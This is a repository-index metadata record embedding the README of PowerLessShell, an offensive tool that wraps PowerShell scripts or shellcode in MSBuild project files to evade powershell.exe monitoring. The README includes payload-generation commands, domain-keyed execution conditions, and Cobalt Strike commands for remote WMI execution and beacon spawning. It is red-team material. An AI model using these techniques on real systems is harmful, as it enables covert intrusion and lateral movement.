{"id":13844329,"url":"https://github.com/Mr-Un1k0d3r/PowerLessShell","last_synced_at":"2025-07-11T22:31:28.940Z","repository":{"id":37256099,"uuid":"92781462","full_name":"Mr-Un1k0d3r/PowerLessShell","owner":"Mr-Un1k0d3r","description":"Run PowerShell command without invoking powershell.exe","archived":false,"fork":false,"pushed_at":"2023-03-23T13:30:14.000Z","size":130,"stargazers_count":1507,"open_issues_count":2,"forks_count":255,"subscribers_count":57,"default_branch":"master","last_synced_at":"2025-05-23T00:07:40.072Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Mr-Un1k0d3r.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2017-05-29T23:03:52.000Z","updated_at":"2025-05-20T06:36:55.000Z","dependencies_parsed_at":"2022-07-12T04:31:08.911Z","dependency_job_id":"768b6741-c2f2-4610-b902-bf9caef5a6b8","html_url":"https://github.com/Mr-Un1k0d3r/PowerLessShell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Mr-Un1k0d3r/PowerLessShell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Mr-Un1k0d3r","download_url":"https://codeload.github.com/Mr-Un1k0d3r/PowerLessShell/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Mr-Un1k0d3r%2FPowerLessShell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264909966,"owners_count":23682096,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:40.436Z","updated_at":"2025-07-11T22:31:28.663Z","avatar_url":"https://github.com/Mr-Un1k0d3r.png","language":"Python","readme":"# PowerLessShell\n\nPowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. \nYou can also execute raw shellcode using the same approach.\n\n# MSBuild conditions \n\nMSBuild support condition that can be used to avoid running code if the condition is not met.\n\n```\n\u003cTarget Name=\"x\" Condition=\"'$(USERDOMAIN)'=='RingZer0'\"\u003e\n```\n\nThe malicious code will only be executed if the current user domain is \"RingZer0\"\n\nCondition supports several other formats that can be used to create more conditional execution check.\n\n```\n\u003cTarget Name=\"x\" Condition=\"'$(registry:HKEY_LOCAL_MACHINE\\blah@blah)'\u003e='0'\"\u003e\n```\n\nProperty Functions also expose interesting data.\n\n```\nhttps://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions\n```\n\n# Usage\n\nPowerLessShell use commandline argument to generate the final file.\n\n```\n$ python PowerLessShell.py -h\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nusage: PowerLessShell.py [-h] [-type TYPE] -source SOURCE -output OUTPUT\n                         [-arch ARCH] [-condition CONDITION]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -type TYPE            Payload type (shellcode/powershell) default to:\n                        shellcode\n  -source SOURCE        Path to the source file (raw shellcode or powershell\n                        script)\n  -output OUTPUT        MSBuild output filename\n  -arch ARCH            Shellcode architecture (32/64) default to: 32\n  -condition CONDITION  XML Compiling condition default (Check for USERDOMAIN)\n                        default is: none\n```\n\nGenerating a powershell payload\n```\n$ python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-powershell.csproj as the template\nFile 'malicious.csproj' created\nProcess completed\n```\n\nGenerating a shellcode payload\n```\n$ python PowerLessShell.py -source shellcode.raw -output malicious.csproj\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-shellcode.csproj as the template\nFile 'malicious.csproj' created\nProcess completed\n```\n\nGenerating a 64 bits shellcode payload\n```\n$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64\nPowerLessShell Less is More\nMr.Un1k0d3r RingZer0 Team\n-----------------------------------------------------------\nGenerating the msbuild file using include/template-shellcode.csproj as the template\nGenerating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe\nFile 'malicious.csproj' created\nProcess completed\n```\n\n# Cobalt Strike Aggressor script (wmi_msbuild.cna) \nBy Alyssa (ramen0x3f) and MrT-F\n### Set Up\n* Either copy PowerLessShell folder to [cobalts working dir]/PowerLessShell or make note of path\n* If you didn't copy it to the Cobalt directory: edit the $pls_path variable in this file to point to PowerLessShell\n* Load script into Cobalt Strike\n\n### Usage\n```\ncheck_msbuild -target TARGET   \t\tVerify .NET 4.0.30319 is installed (should see \"Status OK\")\n\t[-user user] [-pass pass]\t\tWindows 7 has .NET 4.0.30319 after 3 reboots and 4 Windows update cycles\n\nrename_msbuild -target TARGET \t\tCopy MSBuild.exe. \n\t-msbuild newname \n \t[-path C:\\new\\path] \t\tDefault - C:\\Users\\Public\\\n\t[-user domain\\username]\t\tSpecifying user/pass spawns cmd on remote host.\n \t[-pass password]\t\t\t\n\nwmi_msbuild -target TARGET \t\t \tSpawn new beacon. \n         -listener LISTENER\n\t[-payload new_file]\t\t \tDefault - [a-zA-Z].tmp\n\t[-directory new_dir]\t\t\tDefault - C:\\Users\\Public\\\n\t[-msbuild alt_msbuild_location] \t\n\t[-user USERNAME] [-pass PASSWORD]\t\n\t[-manualdelete]\t\t\t\tSwitch doesn't auto delete payload.\n```\n### OpSec Notes\nSpawns cmd.exe on the target system if\n* ManualDelete switch is not set\n* rename_msbuild is run with a username/password specified\n\n# Credit\nMr.Un1k0d3r RingZer0 Team 2017\n\n","funding_links":[],"categories":["Python (1887)","Python","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FMr-Un1k0d3r%2FPowerLessShell/lists"}